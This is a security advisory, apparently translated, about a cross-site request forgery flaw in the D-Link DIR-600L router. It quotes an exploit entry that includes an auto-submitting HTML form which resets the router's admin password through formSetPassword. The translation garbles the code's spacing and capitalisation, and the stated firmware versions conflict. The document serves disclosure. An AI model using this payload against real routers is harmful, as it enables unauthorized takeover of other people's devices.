Release date:
Updated on:
Affected Systems:
D-Link DIR-600L
Description:
--------------------------------------------------------------------------------
D-Link DIR-600L is a wireless router product.
D-Link DIR-600L revision A1 firmware version 1.0, revision B1 firmware version 2.0, without correctly checking the validity of certain requests, which allows some users to perform unauthorized operations through HTTP requests.
<* Source: Dhruv Shah
Link: http://secunia.com/advisories/57392/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
######################################## ######################################## ####
# Exploit Title: Dlink DIR-600L Hardware Version AX Firmware Version 1.00
CSRF Vulnerability
# Google Dork: N/
# Date: 20/03/2014
# Exploit Author: Dhruv Shah
# Vendor Homepage:
Http://www.dlink.com/us/en/home-solutions/connect/routers/dir-600l-wireless-n-150-home-cloud-router
# Software Link: N/
# Hardware Version: E4
# Firmware Version: 5.10
# Tested on: Router Web Server
# CVE: N/
######################################## ######################################## ###
Cross Site Request Forgery
This Modem's Web Application, suffers from Cross-site request forgery
Through which attacker can manipulate user data via sending him malicious
Craft url.
The Modems's Application not using any security token to prevent it
Against CSRF. You can manipulate any userdata. PoC and Exploit to change
User password:
In the POC the IP address in the POST is the modems IP address.
<Html>
<Body>
<Form id = "poc" action = "http: // 192.168.0.1/goform/formSetPassword"
Method = "POST">
<Input type = "hidden" name = "settingsChanged" value = "1"/>
<Input type = "hidden" name = "config. login_name" value = "admin"/>
<Input type = "hidden" name = "config. password" value = "YWRtaW4A"/>
<Input type = "hidden"
Name = "config. web_server_allow_graphics_auth"
Value = "false"/>
<Input type = "hidden"
Name = "config. web_server_allow_wan_http" value = "false"/>
<Input type = "hidden"
Name = "config. web_server_wan_port_http" value = "8080"/>
<Input type = "hidden"
Name = "config. wan_web_ingress_filter_name" value = ""/>
<Input type = "hidden" name = "wan_ingress_filter_details"
Value = ""/>
</Form>
</Body>
<Script type = "text/javascript">
Document. getElementById ("poc"). submit ();
</Script>
</Html>
______________________
* Dhruv Shah ** aka Snypter *
Blogger | Researcher | Consultant | Writer
Youtube Facebook Linkedin Twitter Blog
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.dlink.com/